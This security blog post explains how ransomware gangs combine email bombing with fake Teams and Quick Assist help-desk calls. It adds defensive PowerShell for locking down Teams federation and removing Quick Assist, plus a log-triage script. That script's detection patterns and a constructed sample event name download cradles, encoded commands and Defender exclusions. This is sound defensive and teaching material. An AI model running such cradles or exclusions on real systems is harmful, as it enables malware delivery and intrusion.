Ransomware Tactics Evolve: Why Email Bombing and Microsoft Teams Scams Should Concern You

Have you ever been bombarded by endless spam emails and thought, “This is just annoying”? What if I told you it’s more than just a nuisance? Ransomware gangs have upped their game, combining email bombing with sneaky tech support scams over Microsoft Teams. It’s a double whammy aimed at tricking employees into unknowingly handing over the keys to the company network.

Let’s break this down. Imagine getting thousands of spam emails in the span of an hour, leaving your inbox overwhelmed and your patience tested. Then, out of nowhere, you receive a Microsoft Teams call from someone claiming to be from IT support. Would you answer it? Would you believe them if they said they could fix your email chaos? That’s exactly the trap being set by these cybercriminals.

How Are They Doing This?

Ransomware gangs are exploiting the default configuration of Microsoft Teams, which often allows external domains to call or message employees. Once they get through, the hackers pretend to be your helpful IT team, guiding you to install remote control software under the guise of fixing the problem. But instead of help, they’re installing malware that opens the door to your company’s entire network.

This tactic first caught the attention of researchers last year, with attacks attributed to the notorious Black Basta ransomware gang. Sophos, a leading cybersecurity company, has since observed the same methods being used by other groups, potentially linked to the FIN7 gang. These aren’t amateurs; these are professionals in cybercrime, and they’re refining their strategies.

What Does This Look Like in Action?

Let me paint a picture of one such attack:

  1. Step 1: Email Bombing
    • Hackers send thousands of spam messages to an employee’s inbox—we’re talking 3,000 emails in 45 minutes. This overload is designed to create chaos and frustration.
  2. Step 2: The Fake IT Call
    • Shortly after the email storm, the employee receives a Teams call from an external account called “Help Desk Manager.” The person on the other end sounds knowledgeable, convincing, and—most importantly—helpful.
  3. Step 3: Remote Access Setup
    • The attacker convinces the victim to set up a remote control session through Teams. Once they’re in, they drop malicious files—a Java archive (MailQueue-Handler.jar) and Python scripts hosted on an external SharePoint link.
  4. Step 4: Malware Deployment
    • The malware executes PowerShell commands to download legitimate software (like ProtonVPN) and side-load malicious DLL files alongside it. Those DLLs open encrypted communication channels back to the attackers, giving them persistent remote access to the compromised machine.

From there, it’s a playground for the hackers: they’ll check system details, drop additional malware, and even use penetration testing tools like RPivot to pivot further into the network. Sophos researchers noted that the endgame was likely to steal sensitive data before deploying ransomware.

Another Campaign, Another Tactic

A similar campaign took a slightly different approach. Here, hackers again bombarded employees with spam emails, but instead of using Teams remote control, they guided the victim to install Microsoft Quick Assist. This gave the attackers direct, hands-on access to the system, which they used to:

  • Download malware hosted on Azure Blob Storage.
  • Side-load malicious DLLs into legitimate processes like Microsoft OneDrive.
  • Steal credentials, log keystrokes, and scan the network for further targets.

The ultimate goal? Deploy Black Basta ransomware. But before doing so, the attackers combed through files with names like “passwords,” accessed Remote Desktop Protocol (RDP) files, and likely exfiltrated any valuable data they could find.

Why Does This Matter to You?

It’s easy to think, “This would never happen to us,” but these tactics exploit human trust and default configurations. How often do we accept calls or messages at face value, especially when they come from someone claiming to be IT support? And how many companies leave Microsoft Teams open to external domains, unaware of the risks?

What Can You Do to Stay Safe?

  1. Block External Domains: Adjust Microsoft Teams settings to prevent messages and calls from external domains unless absolutely necessary.
  2. Disable Quick Assist: On critical environments, disable tools like Quick Assist to limit potential avenues for attackers.
  3. Train Your Team: Educate employees about these evolving tactics. Emphasize the importance of verifying IT support requests, especially if they come via unexpected channels.
  4. Strengthen Email Filters: Implement robust email filtering to block spam and phishing campaigns before they reach your employees.
  5. Monitor for Suspicious Activity: Keep an eye on unusual file downloads, PowerShell executions, and new services being created on endpoints.
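Items 1 and 2 above are both configuration changes, so here is what they look like as a script. This is an added example, not code from the article or from Sophos. It assumes the MicrosoftTeams PowerShell module is installed, that the account running it holds a Teams administrator role, and that the endpoint part runs in an elevated session on the Windows client being hardened. The domain "partner.example" is a placeholder for whatever partner tenants you actually need to federate with; the Store package name for Quick Assist is the one Microsoft publishes it under.

```powershell
#Requires -Modules MicrosoftTeams
# Added example, not code from the article or from Sophos. Assumes the
# MicrosoftTeams module, a Teams admin role, and an elevated session for the
# endpoint section. 'partner.example' is a placeholder domain.

Connect-MicrosoftTeams | Out-Null

# ---- 1. Teams external access (tenant-wide) --------------------------------
# Record the starting state so the change is auditable.
$before = Get-CsTenantFederationConfiguration
"Before: AllowFederatedUsers=$($before.AllowFederatedUsers) AllowTeamsConsumer=$($before.AllowTeamsConsumer) AllowTeamsConsumerInbound=$($before.AllowTeamsConsumerInbound)"

# Domains you have a business reason to federate with. Empty list = no federation.
$trustedDomains = @('partner.example')   # placeholder list, keep it short and reviewed

if ($trustedDomains.Count -eq 0) {
    # No partner tenants at all: switch external federation off completely.
    Set-CsTenantFederationConfiguration -AllowFederatedUsers $false
}
else {
    # Replace the default "any external domain may call or chat" with an explicit
    # allow list, so a tenant the attacker registered is rejected at the edge.
    $patterns  = foreach ($d in $trustedDomains) { New-CsEdgeDomainPattern -Domain $d }
    $allowList = New-CsEdgeAllowList -AllowedDomain $patterns
    Set-CsTenantFederationConfiguration -AllowFederatedUsers $true -AllowedDomains $allowList
}

# Personal (consumer) Teams accounts are governed by a separate switch; a
# "Help Desk Manager" caller can just as easily come from one of those.
Set-CsTenantFederationConfiguration -AllowTeamsConsumer $false -AllowTeamsConsumerInbound $false

$after = Get-CsTenantFederationConfiguration
"After:  AllowFederatedUsers=$($after.AllowFederatedUsers) AllowedDomains=$($after.AllowedDomains)"

# ---- 2. Quick Assist on critical endpoints ---------------------------------
# Older builds ship Quick Assist as a Windows capability; newer builds ship it
# as a Store app. Remove both forms so there is nothing for the user to launch
# when a caller asks them to "open Quick Assist".
Get-WindowsCapability -Online |
    Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' } |
    ForEach-Object {
        Remove-WindowsCapability -Online -Name $_.Name | Out-Null
        "Removed capability $($_.Name)"
    }

Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue |
    ForEach-Object {
        Remove-AppxPackage -Package $_.PackageFullName -AllUsers
        "Removed Store package $($_.PackageFullName)"
    }
```

Run the Teams section once per tenant and push the endpoint section through Intune or a GPO startup script rather than by hand. Removing Quick Assist does not stop a user from installing some other remote control tool if a caller talks them into it, which is why item 3 (training people to verify unexpected "IT support" contact through a known channel) still matters.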

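For item 5, "monitor for suspicious activity", the following is an added example (not code from the article or from Sophos) of a small triage script over the two Windows event sources the attack chain above would touch: PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, event ID 4104, which must be enabled by policy) and new service installations (System log, event ID 7045). The function names, the detection patterns and the sample events at the bottom are all mine; the sample events are constructed for the demonstration and are not real telemetry.

```powershell
# Added example, not from the article or from Sophos. Function names and rules
# are the author's own; the sample events at the bottom are constructed.
Set-StrictMode -Version Latest

# Script-block fragments that are rarely typed by hand but common in download
# cradles and loaders. Regexes, matched case-insensitively.
$downloadPatterns = @(
    'DownloadFile\(', 'DownloadString\(', 'Invoke-WebRequest', 'iwr\s',
    'Start-BitsTransfer', 'FromBase64String', '-EncodedCommand', '-enc\s',
    'Add-MpPreference\s+-ExclusionPath'
)
# A service binary living in a user-writable location is a classic sign of an
# unauthorised install rather than a packaged product.
$userWritablePaths = '\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\'

function Find-SuspiciousEvents {
    # Emits one finding object per event that matches a rule. Input objects need
    # Id, TimeCreated and Message, which is what Get-WinEvent records carry.
    param([Parameter(ValueFromPipeline)] [object[]] $Events)
    process {
        foreach ($e in $Events) {
            switch ($e.Id) {
                4104 {
                    $hits = $downloadPatterns | Where-Object { $e.Message -imatch $_ }
                    if ($hits) {
                        [pscustomobject]@{
                            Time   = $e.TimeCreated
                            Rule   = 'PowerShell download/decode cradle'
                            Detail = ($hits -join ', ')
                        }
                    }
                }
                7045 {
                    # 7045 messages read "Service Name: ... Service File Name: ...
                    # Service Type: ..." on separate lines; pull out the file name.
                    if ($e.Message -imatch 'Service File Name:\s*(?<path>.+?)\s*Service Type:') {
                        $path = $Matches['path']
                        if ($path -imatch $userWritablePaths) {
                            [pscustomobject]@{
                                Time   = $e.TimeCreated
                                Rule   = 'New service from user-writable path'
                                Detail = $path
                            }
                        }
                    }
                }
            }
        }
    }
}

function Get-RecentEndpointEvents {
    # Pulls both event sources from the local machine for the last N hours.
    # 4104 events only exist if script block logging is enabled.
    param([int] $Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $filters = @(
        @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since },
        @{ LogName = 'System'; Id = 7045; StartTime = $since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue
    }
}

# Constructed sample events standing in for Get-WinEvent output: one benign and
# one suspicious script block, one vendor service and one service from Temp.
$sampleEvents = @(
    [pscustomobject]@{ Id = 4104; TimeCreated = (Get-Date); Message = 'Get-ChildItem C:\Reports | Measure-Object' },
    [pscustomobject]@{ Id = 4104; TimeCreated = (Get-Date); Message = '(New-Object Net.WebClient).DownloadFile("https://example.invalid/vpn.zip","$env:TEMP\vpn.zip")' },
    [pscustomobject]@{ Id = 7045; TimeCreated = (Get-Date); Message = "A service was installed in the system.`r`n`r`nService Name:  UpdateSvc`r`nService File Name:  C:\Users\alice\AppData\Local\Temp\update.exe`r`nService Type:  user mode service" },
    [pscustomobject]@{ Id = 7045; TimeCreated = (Get-Date); Message = "A service was installed in the system.`r`n`r`nService Name:  VendorHelper`r`nService File Name:  C:\Program Files\Vendor\helper.exe`r`nService Type:  user mode service" }
)

# Expected: two findings, the DownloadFile script block and the Temp-path service.
$sampleEvents | Find-SuspiciousEvents | Format-Table -AutoSize

# On a real endpoint, feed live events instead of the samples:
# Get-RecentEndpointEvents -Hours 24 | Find-SuspiciousEvents
```

The rules are deliberately narrow and will miss plenty, but they catch the two behaviours the post singles out (a download cradle in PowerShell and a freshly installed service) without needing a SIEM. Before relying on 4104, confirm "Turn on PowerShell Script Block Logging" is enabled in policy, otherwise that log will simply be empty and the script will report nothing.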
Final Thoughts

The sophistication of these ransomware gangs is a wake-up call for organizations everywhere. They’re not just targeting systems; they’re targeting people. By exploiting trust and default settings, they’re finding new ways to breach networks and cause chaos.
